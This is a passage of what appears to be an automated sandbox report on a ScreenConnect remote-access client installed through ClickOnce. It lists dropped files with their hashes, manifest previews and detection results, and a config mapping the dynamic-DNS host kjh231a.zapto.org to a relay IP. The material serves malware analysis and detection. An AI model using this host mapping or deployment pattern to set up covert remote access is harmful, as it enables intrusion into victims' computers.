                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                        Entropy (8bit):4.877417023647245
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:fa6Q/cUgJOe6S+9oww7gk7Fw+f7iI++5dFkEM6Vbjft0nwbOA:faV/cAeV+WwwFFwOiMRkbort0nEOA
                                                                                                                                                                                                                                                        MD5:0B52895474211A7B870D086B45646E81
                                                                                                                                                                                                                                                        SHA1:AE29D7BF8949317A2B39F61FB7126643BA65EEC6
                                                                                                                                                                                                                                                        SHA-256:1D6ACB2363856BCB2C116165E6E4EE110FB09DB666A2A90DE8FEEB44D28339C4
                                                                                                                                                                                                                                                        SHA-512:B95BA9FC407E873C11CABE3359CDAF27BB753028B52CFB6EF9310C539260BDC9FB04716A16642BCF1239DB35B86338D8BD9C5C8A6F6E646CF4871D891AB96515
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                                        Entropy (8bit):5.740513993207141
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:s1AT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWoOwj:s1e9rI6wAX9LX9R/QPIBM7YLj
                                                                                                                                                                                                                                                        MD5:890489AF466145A6050725745FF0103B
                                                                                                                                                                                                                                                        SHA1:7F0EB182B0D04E10899E46EE3A0DFA7665CF97C4
                                                                                                                                                                                                                                                        SHA-256:0A4E46E21949EE6138752B89542FA41BD84F566AF0B8E6C691C002FCC0D6CB43
                                                                                                                                                                                                                                                        SHA-512:3DA08E95A29052E54A157321BCC1265FD7F5B624F41E274AFE170294ED8B1BE05301446ADC159E6B2AAE0F30AAFCBEC6EC2F5A576E7CD97DCA118C6934525213
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                                        Entropy (8bit):4.216349786664715
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:0AjMeV+Ww8+45utWznn/lpz57y05slTyOmBf:08J1utqcbyr
                                                                                                                                                                                                                                                        MD5:9BF871F6158A7DB421DB4B7E78B301CF
                                                                                                                                                                                                                                                        SHA1:AB71A84595493DB6784E0148F2F5FF8D5304389E
                                                                                                                                                                                                                                                        SHA-256:7D42E545A45AE4D792376B372B9BCDD5CC2C3A7A1F4C8B2EF914A9FA51C87F97
                                                                                                                                                                                                                                                        SHA-512:D92A0DCB4CD830F4C4987F9873472D97079A292CC5DE19DD9FCF783B70B9A1AEB2D3281CE2E67C9B99005109FB8CB035CF274186D5EB38874868632A06E342F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                        MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                        SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                        SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                        SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):359
                                                                                                                                                                                                                                                        Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                        Encrypted:false
